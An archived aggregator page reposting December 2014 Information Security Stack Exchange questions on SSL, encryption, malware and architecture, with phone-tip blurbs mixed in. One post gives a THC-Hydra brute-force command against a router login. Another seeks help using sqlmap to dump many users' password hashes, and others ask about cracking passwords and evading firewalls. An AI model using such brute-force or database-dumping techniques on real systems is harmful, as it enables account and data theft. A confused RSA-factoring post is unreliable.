Information Security: décembre 2014

mercredi 31 décembre 2014

Are there any filesystems that have secure deletion as a feature?

There's many 3rd party tools people have designed to perform secure deletion, but I don't know of any filesystems where secure deletion is built in. In fact, secure deletion has to work around features of filesystems like journaling that (inadvertently) make secure deletion more difficult. Are there any filesystems that allow secure deletion as a feature?

My own research revealed a set of patches to ext4 by an Allison Henderson, but the last references I can find for this are from 2011. They appear to be not perfect, but far better than the complete non-wipe that happens in most, if not all modern filesystems.

Office password protection crack

would just like to have a check on the password protection/encryption of MS office 2007 and above. It is said that its not that easy to crack the password protection except by brute force, since 2007 and above version of office use AES128bit encryption. Is this true till now, as in have you come across any cracking tools that is able to crack 2007 and above password protections? thanks

Nexus 6 tips: 5 to unleash your device's true potential

The Nexus 6 has a wide range of features, many of which you can discover in our useful Nexus 6 tips article!

(This is a preview - click here to read the entire entry.)

Is truecrypt still safe?

I want to fully encrypt an disk on Windows 7 , but i don't trust bitlocker and truecrypt has announced as non safe ,and many rumors about NSA being able to decrypt it and with it weird end it's better to avoid it. So what can i use? Open source is better ,and what is the most secure encryption combination today ? I see many people still trust truecrypt are them at risk of anyone easy access the data?

Attackers of Google DNS hijacking

As we know Google DNS server (8.8.8.8) in 14th and 15th March was hijacked in Sao Paulo. And subsequent to this event, BGPmon.org announced an alert

BGPmon alert

Now, In a course assignment, we are asked to find AS number of the attacker. I for this question have downloaded related dump files from routeviews.org and found this related messages:


TIME: 03/15/14 17:23:56
TYPE: BGP4MP/MESSAGE/Update
FROM: 187.16.216.20 AS28571
TO: 187.16.216.223 AS6447
ORIGIN: IGP 
ASPATH: 28571 1251 20080 7908 
NEXT_HOP: 187.16.216.20 
ANNOUNCE 
   8.8.8.8/32 

TIME: 03/15/14 17:23:56
TYPE: BGP4MP/MESSAGE/Update
FROM: 187.16.218.21 AS52888
TO: 187.16.216.223 AS6447
ORIGIN: IGP
ASPATH: 52888 1251 20080 7908
NEXT_HOP: 187.16.218.21
ANNOUNCE
   8.8.8.8/32

Our TA would say the attacker's AS was 7908 (BT LATAM Venezuela, S.A). But in my opinion it wasn't, because in my view there is no advantages to be exploited by the attacker if he does redirect traffics to his own AS. Despite of this, I couldn't find any update messages originated by this AS in dump files. In other hand, in the picture above, time of attack has been announced 17:23 and from this time onwards, I couldn't find any interesting messages in dump files.

My question is, can anyone please tell me what's the real AS number of attacker?

Thanks in advance

Is it possible to use an open collection of default SSL certificates for my browser?

Browsers and OSes come with a set of default SSL certificates for well known organizations, such as root certificates from CAs.

I understand that the trust model is as follows: I pick (actually my software's developers pick for me) a few major certificate authorities and decide I trust them. While I hardly ever go to the sites of these CAs, the sites I do go to use certificates that are dependent on the CAs, such that I automatically trust any certificate descended from a root certificate that I trust.

However, I actually trust the sites I visit more than the root CAs. So, I don't want to use this tree-based model. Instead, I would like it to be my personal responsibility to individually verify and store the certificate of every site I visit. I understand that this may introduce risks since my own resources for detecting compromised certificates are limited.

It seems like I could do this today: I can delete all my root certificates, and just start adding exceptions for every site I visit (assuming that I decide to trust them). However, this would introduce a very frustrating adjustment period where my browsing is frequently interrupted by having to constantly add exception for sites I browse frequently.

I further imagine that this impracticality can be easily solved: Many sites I visit are uncontroversial, trustworthy, straightforward cases like Google, StackExchange, news sites and so forth. If a few random strangers on the internet all agreed that a certificate is the legitimate SSL certificate for www.cnn.com, I could believe them and just use the certificate they gave (what are the odds that these people have compromised the certificate of CNN and at the same time conspired to fabricate an apparent consensus in favor of the forged certificate?). So, there could be a crowd-sourced online repository of common, uncontroversial sites so that I can simply download their certificates in bulk every year or so and massively reduce the number of exceptions I need to add. Obviously, sensitive cases like my bank would not be included in this repository - I would manually vet that certificate myself after careful consideration.

This would eliminate my need to trust root certificates, and eliminate the risk of compromised or malicious CAs. In exchange, the new risk is that there happens to be a very concerted operation to poison the repository with forged cetrificates of an inconsequential site that has been compromised just as I download my certificates for the year (I can further compare those to the ones I already have and scrutinize unexpected changes). The impact on usability is negligible: After installing my browser, I just need to download a zip full of certificates and dump them into my certificate cache. I would now need to personally decide whether to trust obscure or sensitive sites instead of automatically trusting them through the root certificate, but perhaps that is not such a bad thing.

Is this sort of model possible? Does such a repository already exist? Are there important flaws that I have failed to consider?

Note that I am interested also in implications of long-standing security problems. For instance, I think it is interesting to consider the implication of adopting my above proposed scheme, given the possibility that my root CA and my bank have already been compromised and have been so for several years.

SSL Providers that cover www and the root domain in one cert

I'm finding it hard to get details on which SSL providers will include www.example.com and example.com in a basic DV cert. Anyone know of a list?

I know GoDaddy and DigiCert do this.

Do all important system changing activities need to go through the kernel on a Linux-based system?

I'm assuming it is possible for an attacker to bypass the Linux kernel to make changes to system memory, hard drives etc.

HTC One (M8) tips and tricks to keep your handset performing at its best

The HTC One M8 is one of the best handsets currently on Android. Here are some of our favorite HTC One M8 tips.

(This is a preview - click here to read the entire entry.)

Happy New Year from us all at AndroidPIT!

As we come to the end of a fun and successful year on AndroidPIT and look forwards to 2015, we want to wish you all the best in the new year!

(This is a preview - click here to read the entire entry.)

Smart Card for RSA private key for SSL?

I have a YubiKey NEO which has a lot of amazing capabilities such as OTP, U2F, and PGP smart card for PGP/GPG and even SSH keys. One of the applications I've discovered recently for the device is a PIV applet which you can use to securely store a SSL certificate's private RSA key.

I find this pretty fascinating, as it makes it much more difficult without physical access to steal a SSL certificate.

Is it possible to use a smart card like this for a SSL server's private key? I've never seen configuration in Apache or nginx which would seem to indicate support for anything other than file-based SSL private keys.

Also, the demo given for the PIV applet shows how to create a local file-based private key and then send it to the smart card; is there a way to create the key securely on the card, so that it is never stored anywhere? I know I could just store it in a RAM disk/filesystem so that it's never written to disk, but is there a way to generate it on-device as is possible using OpenPGP for PGP keys?

Running tails on a corporate computer

Is it safe to run TAILS on a corporate computer?

I mean a corporate computer that has hardware cryptography and probably some backdoors; and, by safe, I mean that nobody will be able to recover what I did with TAILS locally.

ps : by corporate computer I meant a laptop and using it at mcDonalds or starbucks.

Is using VPN on a router more secure than using a dedicated VPN machine?

I was looking at the features of the Asus RT-N66U router and noticed the built-in VPN feature. I am currently running an OpenVPN server on an ESXi VM, but I was wondering: would using the VPN feature on a router be more secure? After all, this way you wouldn't have to do any kind of port forwarding to the internal network, right?

Or perhaps, security-wise, there are no differences between the two approaches?

So This Is Possibly An All Encompassing Question

I'm teaching myself everything I can about programming, security, data, encryption, hacking, pen-testing, QA testing, and command line. my question is does any one have advice on where to start with any of the topics, free online tutorials/school such as codecademy/hackthissite (anything that teaches while having you go through the process), books, or any advice at all.

Thank You For Your Time, - Corgi

Others using my Facebook account [on hold]

Why would someone want to borrow my Facebook account? I was playing a game, and someone in my group wanted to chat on Facebook instead of using the game chat, which is not all that uncommon. After we became FB friends, he shortly asked me if he could borrow my account. I found that quite odd, and of course I refused. I have not known this person very long. What risk may this be, what may be his motive(s), and what would you suggest I do?

Galaxy Alpha tips and tricks: 5 you must check out

The Galaxy Alpha, Samsung's slimmest Galaxy smartphone ever, is a beautiful device. Here's how you can make it even better with our Galaxy Alpha tips!

(This is a preview - click here to read the entire entry.)

native mac malware opening urls across all browsers

I'm a security newbie so please excuse the solely high level symptomatic description of my problem.

My friend doesn't know how he got it, but he has some form of malware on his mac which, when he opens a URL, spontaneously opens an additional URL in a new tab. This occurs across all browsers so I'm guessing the malware is native. Anyone got pro tips for getting rid of it?

I was thinking of listing all running processes with ps aux, sequentially killing suspicious-looking ones while opening URLs, until the spontaneous URLs stop, and then use the path to remove the executable. But I'm inexperienced at discriminating suspicious ones, there are 153 running processes, and I guess removing the executable might not be sufficient if the malware is sophisticated enough.

Public key authentication: how to generate digital signatures?

I've just started reading about SSH and how it's used for authentication. From this website, it says:

The private key is able to generate signatures. A signature created using your private key cannot be forged by anybody who does not have that key; but anybody who has your public key can verify that a particular signature is genuine.

So you generate a key pair on your own computer, and you copy the public key to the server. Then, when the server asks you to prove who you are, PuTTY can generate a signature using your private key. The server can verify that signature (since it has your public key) and allow you to log in. Now if the server is hacked or spoofed, the attacker does not gain your private key or password; they only gain one signature. And signatures cannot be re-used, so they have gained nothing.

My question is what kind of message is used in real life, along with your private key, to generate the digital signature? And once the server applies its public key to generate the original message, how does it know whether that message is correct? Is the message publicly available?

Or when you try to connect, does the server send out a one-time-use message for you to create the digital signature from using your private key?

It is safe to share a wireshark file?

I wanted to share a wireshark of my file, because it may help with some problems i'm having but i need to know if it is safe, or if could reveal sensitive data about me, the only IP's i see are my internal ones not external

How does disabling sign in upon confirmation make devise any more secure?

Referencing reasons given in this question

http://ift.tt/1B9QBbA

Devise does not allow the immediate sign-in of a user that has clicked their confirmation email, the idea being that maybe a malicious user has access to their email, or that they mistyped their email address.

If a user has access to the email that is authorized to use the account, then what prevents them from using the reset password function to completely hijack the account? Why would we bother trying to protect a user's email account when it is entirely beyond our control?

Are there any ways in which this actually makes the Devise authentication framework safer, and not just less convenient for an already unlikely malicious user?

Hacking a remote router

As a part of my B.sc final projecti was asked to exploit an Access Point and via the AP hack the main controller aka the router

I google a little bit but had no success in finding any good answers and i need some pro help with that...

How can I convert a Windows certificate into a PEM format, that includes the chain + root?

I need to import a certificate into a Cisco Ironport for Web SSL inspection. The only input format supported is PEM.

Based on my research the PEM format does support all certificates in the chain, however I'm unsure how to convert a DER/CER/P7b into PEM that includes the chain.

I've been using the following OpenSSL commands to do the conversion, however I don't seem to be getting the full chain. Am I missing a switch?

Extracting the Public key (certificate)

You will need access to a computer running OpenSSL. Copy your PFX file over to this computer and run the following command:

openssl pkcs12 -in <filename.pfx> -clcerts -nokeys -out certificate.cer

This creates the public key file named "certificate.cer" Note: These instructions have been verified using OpenSSL on Linux. Some syntax may vary on the Win32 version.

Extracting and decrypting the Private key

The WSA requires that the private key be unencrypted. Use the following OpenSSL commands:

openssl pkcs12 -in <filename.pfx> -nocerts -out privatekey-encrypted.key

You will be prompted for "Enter Import Password". This is the password created in step 11 above. You will also be prompted for "Enter PEM pass phrase". The is the encryption password (used below).

This will create the encrypted private key file named "privatekey-encrypted.key"

To create a decrypted version of this key, use the following command:

openssl rsa -in privatekey-encrypted.key -out private.key

How to store passwords to a remote web site?

Say I want to build a public API to access a website that doesn't have one. The website is protected by a standard username/password scheme and the API implementation will use scraping to get the data from it.

What would be the best way to handle passwords in this scenario?

My current best idea is this. Get the username and password in an HTML form on my site (the same one that serves the API), and generated a URL to access the API that includes an encrypted blob of username+password. The encryption is symmetric AES256 based on a key stored only on the API server. When the user will access the API URL, the API server will decrypt the credentials and access the remote website.

As an additional level of protection, I'm thinking of running the API as CGI, so that only a short lived process is ever exposed to plaintext credentials.

Does that make any sense? Are there any standard solutions to this kind of problem?

[Edit]

Possible duplicate: How to store passphrase in this situation?

How to watch movies and TV shows for free on Android

Have you ever wondered whether you can watch your favorite TV shows on your device without having to pay for it? Here is how to watch movies & TV shows for free!

(This is a preview - click here to read the entire entry.)

PHP max_input_vars security expectations

Considering a site that handles large POST data, would it be unreasonable and dangerous to set the php.ini max_input_vars to something like 100000? I know this is a vector for DOS attacks, but don't other configurations such as post_max_size help to prevent that? Are there any ways to safeguard against hash collisions while still having max_input_vars set at a high value? Other considerations would be the effect on GET and cookies. Can someone please explain the consequences of this configuration and the exploits involved?

mardi 30 décembre 2014

What is a Mutex and what can it be used for?

Hello i would like to know what is a mutex?


I keep seeing it in malwr.com analysis of the malware but what does it mean?


 Most importantly what would malware use it for.?

I would love a small list of its uses for malware and i know that legit programmes use it to.

Now that it is 2015, what SSL/TLS cipher suites should be used in a high security HTTPS environment?

It has become quite difficult to configure an HTTPS service that maintains "the ideal transport layer". How should an HTTPS service be configured to permit some reasonable level of compatibility while not being susceptible to even minor attacks?

TLS downgrade attacks in combination Beast, Crime, Breach, and Poodle knocks out most if not all of SSLv3 and prior. Microsoft is disabling SSLv3 by default, which sounds like a good move to me. Due to weaknesses in RC4, MD5, and SHA1, there are even fewer cipher suites to choose from.

Would an 'ideal' HTTPS service only enable TLS 1.0, 1.1 and 1.2 with key-size variants following ciphers? What should be the most preferred cipher suite?


TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_DH_RSA_WITH_AES_128_GCM_SHA256

onboard memory of usb hid devices "hackable"?

I own some mice and keyboards for example my logitech G400 mouse and my razer deathstalker keyboard.

Both of those devices have as far as i know built in memories to save DPI settings macros so on and so forth.

Now i have read somewhere some time ago that at some german hacker meeting a guy managed to save a keylogger to a razer deathstalker keyboard.

SO my questions are:

Is the memory built into my razer deathstalker keyboard not secured by a razer digital signature so that it only allows a razer signed driver to save changes to it? Same question goes for my g400 logitech mouse.

In case there is none protection whtasoever how could i overwrite the memory by myself? It's a shame that i don't find the original article i read.

Snort IDS for Amazon deployment

Is Snort a good choice for monitoring network and web application traffic on Amazon EC2? If not, why and what IDS would you suggest? Is Snort a good choice to monitor for XSS, Sql Injection, attempt to brute force accounts and enumerate users, and detect DDoS against the web app?

Snort can be installed on the Linux based loadbalancers (haProxy); but I am not sure where commercial tools like Alert Logic should sit that does not create a performance bottleneck and single point of failure.

Google Chromecast set up guide for beginners

Setting up Chromecast is easy, but sadly Google's instructions are completely unhelpful. Read our guide instead if you're struggling to get started.

(This is a preview - click here to read the entire entry.)

C:\Users\Public\ for sensitive data

Installing a MS Windows based system that is to handle various sensitive data (accounting, personnel etc.). Somewhat to my surprise it consistently want to put everything under


c:\Users\Public\

where it is going to store reports, SQL databases, documents and so on. Is this a poor choice of location for such data?

Believe I can hack the system to accept using a custom path where I can set group access or the like if/when (selected) others are to have access. Would this be worth the work? (Have not used Windows for a long, long time.)

Have spoken with the provider about this, but they seem to have no advice regarding the issue.

Does Google's application specific password automatically status update after the "creation date" with a "last used date"?

I created an ASP for 2 Gmail accounts in March and set up the 2 step verification on my iPhone 4. On May 7, 2014 I was falsely arrested in downtown Vancouver, WA and my iPhone 4 was unlawfully seized from my girlfriends possession by one of the 2 arresting officers. I was exonerated of the bogus felony charge as soon as I posted bail. However, the city attorney's office apparently was still considering misdemeanor criminal charges. On November 17, the city attorney's office sent me a letter informing me that I was no longer under investigation. Needless to say I retrieved my iPhone next day. I had difficulty pasting the image of Gmail's Authorized Access page to this post. The following information is from my Google ASP and 2 step verification page.

Your application-specific passwords Creation date Last used date Gmail on my iPhone Mar 3, 2014 May 7, 2014 [ Revoke ] Gmail 1 on my iPhone Mar 31, 2014 May 7, 2014 [ Revoke ]

In June, I discovered the last used date of May 7 coincided with the arrest date and followed the March 3 & 31 creation dates. I immediately saved my Gmail webpage information then revoked both ASP's. It appears the VPD may have unlawfully accessed my Google account information via my cell phone. I hope I came to the right place for this sort of help. If possible, we need an expert witness/forensics to help validate the 2 step verification process with my Gmail accounts. We have been downloading the details of our data usage from Verizon since March (Verizon only keeps the details online for 90 days). Finally, we also need assistance with preparing a lay persons explanation of the ASP and the 2 step verification process for our attorney. Time is of the essence, please respond to this post or send me a private message to discuss further details in confidence. Thank you. Sincerely, Beanie812

Touch ID authentication concept

I hope this question is appropriate here. If not, please let me know and I'll ask it somewhere else. I'm currently developing an iOS app and in which I encrypt some user data with a user-chosen key. The data can be stored locally or in iCloud or both. I also want to allow a quicker access such as 4-digit pin code or drawn pattern. In both cases I can store an encrypted key in the iOS keychain and decrypt it with the 4-digit code or the pattern string. Basically, I don't store the master key in plaintext to the keychain. The problem is Touch ID. Currently I'm storing the master key in plaintext to the keychain because I can't figure out how not to. If anyone could give me an idea, concept, pseudo code or whatever, I would really appreciate it.

What registrars support *.onion TLD as a Subject Alternative Name, and how does validation work?

I'm interested in obtaining a .onion TLD in my SAN name from a public CA.

Which Public CAs support .onion TLDs and what is the validation process like (e.g. Whois isn't available for ToR)

Update:

Although DigiCert is issuing .onion certificates for Facebook, they have not made a process available to the masses for such a function.

enter image description here

Can SQL-injection lead to remote code execution?

I don't recall where, but I have read about running some code (e.g. PHP code on a PHP-based web application) on the server through SQL injection. Is it possible? If yes, how exactly?

I understand that un-escaped field can lead to SQL injection and an attacker can execute SQL commands of his choice directly on the server. But I think of running only SQL commands, not some arbitrary code. Am I wrong here?

Executed malicious exe file. Help please

windows 8.1 Im not very computer savvy i was wondering if someone could help me out with this. So I downloaded an exe file then ran it as administrator. It turns out it was a virus. Yeah I'm a genius.

File is called Extractor__8680_i1435468059_il22

Shortly afterwards BITSADMIN tool came up in command prompt all on its own and either uploaded or downloaded something or did something which i have never seen before before quickly closing itself. It mentioned a windows32 file. Afterwards I activated malwarebytes and then shortly after that malwarebytes said it stopped a suspicious action on my computer, but i still feel my system is compromised.

I have tried running a few antivirus programs, making sure to check for rootkits even but it doesn't seem to help.

After a while my computer restart all on its own.

I'm at a loss at what to do but im guessing a factory reset is in order?

decoding RSA. what is the complexity?

II° Lepore primality testing and factorization

with an appropriate n the three equations to decode the 'RSA are: (if not mistaken)

X ^ 2 + n * (X * 6) = number rsa

X ^ 2 + (6n + 2) * X = number rsa

X ^ 2 + (6n + 4) * X = number rsa

X = the first factor (unknown)

the three equations of n are: (if not mistaken)

n = (number rsa - X ^ 2) / (X * 6)

n = (number rsa - X * (X + 2)) / (X * 6)

n = (number rsa - X * (X + 4)) / (X * 6)

oh I forgot applies as primality testing and factorization

and do not forget the 2 and 3

We place two examples of decoding X * Y = number rsa example1 the best case is when the two prime numbers are consecutive, or are closest to each other is faster than the algorithm: 10916407 = number rsa; X = 3301; Y = 3307; the cycle (on) will be from 1 to 1 that is a cycle in fact can occur from the first equation X ^ 2 + n * (X * 6) = number rsa example2 The worst case is when the two prime numbers are the highest or farthest distance between them are the slower the algorithm. 50035 = rsa number; X = 5; Y = 10007 the cycle (on) will be from 1 to 1667 in fact can occur from the first equation X ^ 2 + n * (X * 6) = number rsa

In conclusion we can say that we need a mixed algorithm, that is, test the low numbers with I° Test di fattorizzazione e di primalità di Lepore however integers while the algorithm of the three equations.

The n then will have two functions:

for n = 0; n = k; n + 1

{

rsa / value associated with the nth position * 6;

rsa equations for n;

}

explain better with a numerical example

rsa / 1

equations for n = 0

rsa / 5

equations for n = 1

rsa / 7

equations for n = 2

rsa / 11

equations for n = 3

etc.etc.

Find the meeting point, or k, is the complexity of the algorithm.

I'll post some data

100 for k = 3

1000 k = 7

10000 for k = 20

100000 for k = 62

1000000 for k = 194

what is the complexity?

Compromised Wordpress Admin account risk

I am wondering what are the risks of a compromised Wordpress Admin account.

Can the Wordpress Admin user cause any risk to the platform running the wordpress? For example, can the admin gain access to OS or database? If on the same platform, other applications are being run, can the compromised admin cause any issue to other applications?

(I can imagine the hacker would have full control over the website content and look, users account, and can install new plugins that leave a backdoor to come back. But any other risk beyond the wordpress site itself?)

What user interface is most useful to users who use PGP Key Splitting, or other Shamir-based keys?

I am developing an application that uses Shamir-based key splitting, and am looking at various products and am looking for a user-friendly, possibly dynamic graph that helps users build and manage key shares.

Lacking a novel way to manage key sharing, what UI has gained the most traction, and use among users?

Best approach to confirm email within mobile app?

would like your opinion on the options explored:

a- Launch app and ask for a verification code that was sent to user email?

b- Launch app by clicking deep link + verification code in the email and confirm to user their email has been verified

Q1-From a information security point of what are advantages and disadvantages of both these approaches?

Q2- Any other considerations to take into account?

Attackers of Google DNS hijacking

As we know Google DNS server in 14th and 15th March was hijacked in Sao Paulo. And subsequent to this event, BGPmon.org announced an alert

enter image description here

Now, In a course assignment, we are asked to find AS number of the attacker. I for this question have downloaded related dump files from routeviews.org and found this related messages:


TIME: 03/15/14 17:23:56
TYPE: BGP4MP/MESSAGE/Update
FROM: 187.16.216.20 AS28571
TO: 187.16.216.223 AS6447
ORIGIN: IGP 
ASPATH: 28571 1251 20080 7908 
NEXT_HOP: 187.16.216.20 
ANNOUNCE 
   8.8.8.8/32 

TIME: 03/15/14 17:23:56
TYPE: BGP4MP/MESSAGE/Update
FROM: 187.16.218.21 AS52888
TO: 187.16.216.223 AS6447
ORIGIN: IGP
ASPATH: 52888 1251 20080 7908
NEXT_HOP: 187.16.218.21
ANNOUNCE
   8.8.8.8/32

My question is, can anyone please tell me what's the real AS number of attacker?

Thanks in advance

Is it possible to use an open source collection of default SSL certificates for my browser?

Browsers and OSes come with a set of default SSL certificates for well known organizations, such as root certificates from CAs.

Is this sort of model possible? Does such a repository already exist? Are there important flaws that I have failed to consider?

THC-Hydra - one good pass = shows all valid

As in title. I'm testing my router security and I came up with problem.


hydra 192.168.0.1 http-get-form "/:un=^USER^&pw=^PASS^:User Name or Password is incorrect." -L usernames -P passwords

usernames : admin

passwords : admin, root, toor, 1234, realpassword(correct one)

I get: 1 of 1 target successfully completed, 5 valid passwords found

Only realpassword is the correct one but Hydra says all of them are good.

When I go to 192.168.0.1, which is router page, cookie (I guess) from Hydra allows me to be logged in. Still, executing this command does not provide me password, only session.

Q: How can I find out what password is real?

How can I bypass this kind of network

In my university network pretty much everything is restricted..(Every video website, music websites, gaming related, 9gag -,-..) I want to know if i can hack through the firewall restrictions, note that i already tried using every sort of VPN available, it seems like it's blocked too.. What to do ? And if you could also tell me how are they filtering the websites to be blocked. Thanks !

Does malware which infects the BIOS/ Firmware always need 'root' access to do so?

There are very few hardend Operating Systems who restrict or totally disable Terminal 'root' access for the user.

(1) Would this feature prevent persistant BIOS rootkits from writing into BIOS or infecting other firmware on the machine? Whats the security margin of this feature?

(2) Considering above attack vectors, would it make a difference either totally disabling root access (hardcoded) or just use a strong root password? Whats safer?

(3) Could there be exploits which allow malware to write to BIOS without root at all?

What is the need and purpose of packet injection within WiFi attacks

According to my research, the most common WPA/WPA2 WiFi attack requires a chipset capable of packet injection.

However I am not sure what this is, and what purpose it serves once you have the capability to inject packets.

I thought that all WiFi chipsets could send/receive data, and assumed packet injection would come under the sending protocol(whatever that may be) - but I must be missing something as only certain cards can apparently inject packets.

Does it make sense to isolate each web service user on his own servers?

I am planning an architecture of a web application for my company which is launching a financial service for its partners, and my main question is - does it make sense to put each partner on a different server (or even server groups web/db)?

The application is in some sense similar to https://www.wealthfront.com/ - partners trust us with their assets and provide us with data, which we use to automate investments. Each partner has an account with us, login/password pair and a url where he can log in. After login he gains access to a dashboard which contains all his data presented in charts in tables.

Partners and their data is completely independent from each other. We also have some admin interface to preprocess their data and manage their accounts, but there is a separate web/db/workers adm server and partners feed their data to main db via write-only services (they cannot query any arbitrary information).

Partners data is very sensitive, if any of it falls in wrong hands - the impact could be very serious up to us going out of business.

I have two ways in mind on how to organize an architecture of such service:

Grouped, in which we have one server for each role, all partners are sitting all together on each server

Isolated, in which we also have one server for each role, but each partners gets a set of servers for each role

I see two types of scenarios in which unauthorized access to data could happen:

Attackers: somebody hacks some server and gains some kind of access to it. Could be anything from simple misconfiguration (ssh access left from public network without password, heartbleed-like vulnerability, ...). This is too vague and isolation surely cannot save from all scenarios, but I still have a feeling that with all other things being equal isolated architecture is more secure, because it creates more barriers.

Human error: an engineer forgets to add some security checks or inadvertently removes some or gives everyone superadmin powers to see everything, it gets into production and everybody is unhappy. This surely should be prevented by all kinds of rules, reviews, constraints and processes but errors always find their to production. I have a feeling that physical isolation also helps mitigating if something likes happens (even when a junior partner employee gains access to partners senior-only information, it is much better if he gains access to senior-only information of other partner!)

Grouped pros/cons which I see:

[+] more easily scaled

[+] less expensive (less servers, can spread load more effectively)

[+] less to configure (though we are using configuration management tools and host in cloud environment, so it is not a big problem anyway)

[-] every access checks failure will result in exposure of all data data to user

[-] hacking into web/db server gives you access to everything (e.g. if some partner decides to explore and somehow successfully finds his way inside our system)

[-] if one partner creates a lot of load, it hurts everyone (though mitigated by somewhat easy scaling)

[-] cannot effectively use ip-based restrictions (I think)

Isolation pros/cons which I see:

[+] every access checks failure will result in exposure of user's own data to himself

[+] hacking into web/db server gives you only this server data (e.g. if some partner decides to explore and somehow successfully finds his way inside our system)

[+] separates one partner's load on system from other

[+] can tune firewall rules more granularly (we can limit access from only partner ip which is not the case for grouped architecture)

[-] less easily scaled (though this is definitely not a high-load project, so it's not that much of concern)

[-] more expensive

[-] more to configure (though we are using configuration management tools and host in cloud environment, so it is not a big problem)

So far I can see a lot of pros for isolation and some little cons, but there is a huge question: since we use configuration management tools, each server will have the same OS, same software and configuration, same codebase and everything. This way if we have any vulnerability, nothing can stop attacker to use them on all servers, isolated or not. Maybe there are also other pitfalls that I cannot see right now that undermine the whole idea.

So, given all that information:

Do you think that isolated architecture provides more security than grouped?

Are there any serious tradeoffs/showstoppers to isolated architecture that I haven't thought of?

Do you think there's some common alternative solution to this problem (not grouping or isolating, but something else)?

If isolated architecture is good, is there any sense splitting web and db servers (security-wise), since they are already isolated from everything else and splitting them doesn't add more security?

How to crack PPTP hashes from captured traffic?

I have been using PPTP for a while so i did a little research on google i found that MSCHAPv2 or MSCHAPv1 can be cracked by a MITM capture but there wasn't any example. So how it is done if i have a cap file from wireshark and what can i do to secure my VPN ?

Call History, Logs in my phone without making a call

I have call logs and history on my phone. Though I have not made any calls. Can you explain how is this possible?

Danger of default router password

How bad is it to not change the default home router password? Are there any concrete dangers?

Are there any attacks directly resulting out of the use of default passwords, not vulnerabilities in the firmware?[*]

You can assume that anyone legitimately connected to the router is allowed to access and change it's configuration [**].

_{[*] I found this vulnerability, but it seems to be a vulnerability in the router firmware (which could be prevented using anti-csrf tokens), not a direct result of using a default password.}

_{[**] So I'm not worried about other residents or visitors that are allowed access to the network.}

Can't get my SSL CA to work with Apache

So I have an SSL enabled website running on Apache2.


https://eamorr.com (I get a warning in my browser, as expected)

I have a config file for this website at:


/etc/apache2/sites-available/eamorr.com-ssl.conf

Inside this file, I have the following lines:


SSLCertificateFile      /etc/apache2/ssl/http://eamorr.com/eamorr.com.crt
SSLCertificateKeyFile   /etc/apache2/ssl/http://eamorr.com/eamorr.com.key

"eamorr.com.crt" and "eamorr.com.key" were generated by (i.e. self-signed):


openssl genrsa -out eamorr.com.key 2048
openssl req -new -x509 -key eamorr.com.key -out eamorr.com.crt -days 30000
mv eamorr.com.* /etc/apache2/ssl/eamorr.com/
apache2ctl restart

OK, great. I have a working https website with an SSL warning.

Now, I decided to create my own certificate authority (CA) and install this CA on my local computer (I'm using Apple OSX operating system).

So, back on my website's server, using two steps, I sign "eamorr.com.key" using my own CA:


1. sudo openssl req -new -key /etc/apache2/ssl/http://eamorr.com/eamorr.com.key -out /etc/apache2/ssl/http://eamorr.com/eamorr.com.csr   #generates the certificate signing request (CSR)
2. sudo openssl ca -in /etc/apache2/ssl/http://eamorr.com/eamorr.com.csr -config ./openssl.cnf

I'm now given a new certificate that's printed on screen. I copied and pasted this certificate into /etc/apache2/ssl/http://eamorr.com/eamorr.com.crt

I then added another line to the Apache2 configuration for the site:


SSLCertificateChainFile /home/eamorr/ca/eamorr.comCA.crt

, where "eamorr.comCA.crt" is my CA's cert


apache2ctl restart

But what do I do now? I'm stuck!

Even though I've installed my CA's public key into my operating system, I'm still getting this error in Firefox:

Firefox error

"invalid security certificate"?

"the issuer certificate is unknown"?

But I imported my custom CA certificate (eamorr.comCA.crt) into my operating system (Apple OSX - imported into System certificates using the "KeyChain Access" program)???

Can anyone help me?

sqlmap - Dump multiple columns at once?

I'm playing around with sqlmap, and I'm having a little trouble dumping database columns.

I can dump all of them at once which is great, but this database has thousands of users and dumping every column would take over a day, whereas dumping columns individually only takes about 15 minutes. The only problem with this is that all the data is dumped from A-Z, which means I have no idea which hash is for which user.

Is there a way of dumping multiple columns (but not all) at once to prevent them being mixed up?

Cheers!

CSRF Guard - Implementing it across .war files?

I have implemented CSRF Guard in one of the module of a project (aaaa.war) and it's working fine as excepted with in it. Now I have to implement the same in other modules also.

I have done the same steps in other bbbb.war file also (included csrf.jar, js file, change the web.xml and properties file) however in this case tokenfromsession is not matching because in the project there are calls from one .war file to another .war file. (might be the reason)

Any idea why I'm getting this or how can I fix this?

Is it possible to use the same implemented CSRF guard (aaaa.war) in other bbbb.war file also?

Thanks.

Malicious File Upload if HTML file allowed

If there is an application which allows .doc, .txt as well as html extension files . If are uploading a file which is actually a txt file in which malicious script is written and saving it as .HTML. So while accessing that particular file will that script will execute? Developer has made all the validation.

SSL Symetric Key and Asymetric Key

In SSL, usage of symetric key is for the encrypting the data and asymetric key used only for secret key exchange. If we will do it vice versa then what will be the consequences and why? Please suggest.

lundi 29 décembre 2014

Preventing Quantum Attacks on Cryptography

With the advancement of technology in quantum computing, it's becoming more evident that we need to start thinking about protecting the future integrity of our cryptographic standards. What can we do on binary computers to prevent attacks on cryptographic related items such as password hashes and private keys?

network monitoring tool to trigger event

I am using nagios to monitor certain services. I want to trigger event when particular services goes in error state. Lets say disk space is full so send event(like RPC ) to particular service which will resolve this issue.How to configure nagios to send such event ?

iFrame for Credit Card transactions

To reduce the PCI compliance, my company would like to implement iFrame for all credit Card Transactions. I would like to know how to implement iFrame as an automated processes without human intervention especially for recurring payments.

Also I would like to know if it is easy to implement iFrame or Tokenization technique.

It is safe to share a wireshark file?

Can my phone affected by malware through mobile phone signal?

My phone is newly bought. Can a hacker actually scans the mobile phone signal around me, detect it, and put virus/malware into my phone THROUGH the mobile phone signal of my mobile service provider? Assuming the hacker doesn't know my number. I turn off bluetooth and no wifi connection. Is is possible to affect by malware through mobile phone signal, and also the radio frequency signal?? HELP.

mobile phone signal

How do I import a GnuPG private PGP key into Symantec PGP commandline?

I am trying to import a private PGP key into Symantec PGP command line that originated in GnuPGP (1.4.11 AIX) into a Windows system.

When I do a pgp --import private.asc, then do a pgp --list-keys --details I get an invalid key:


C:\Program Files\PGP Corporation\PGP Command Line>pgp --list-keys --details
Key Details: Bank (Joint key) <user@company.com>
     Key ID: 0x4aaaa8 (0x09aaaaaB8)
       Type: RSA (v4) key pair
       Size: 2048
   Validity: Invalid
      Trust: Never (Not axiomatic)
    Created: 2014-02-26
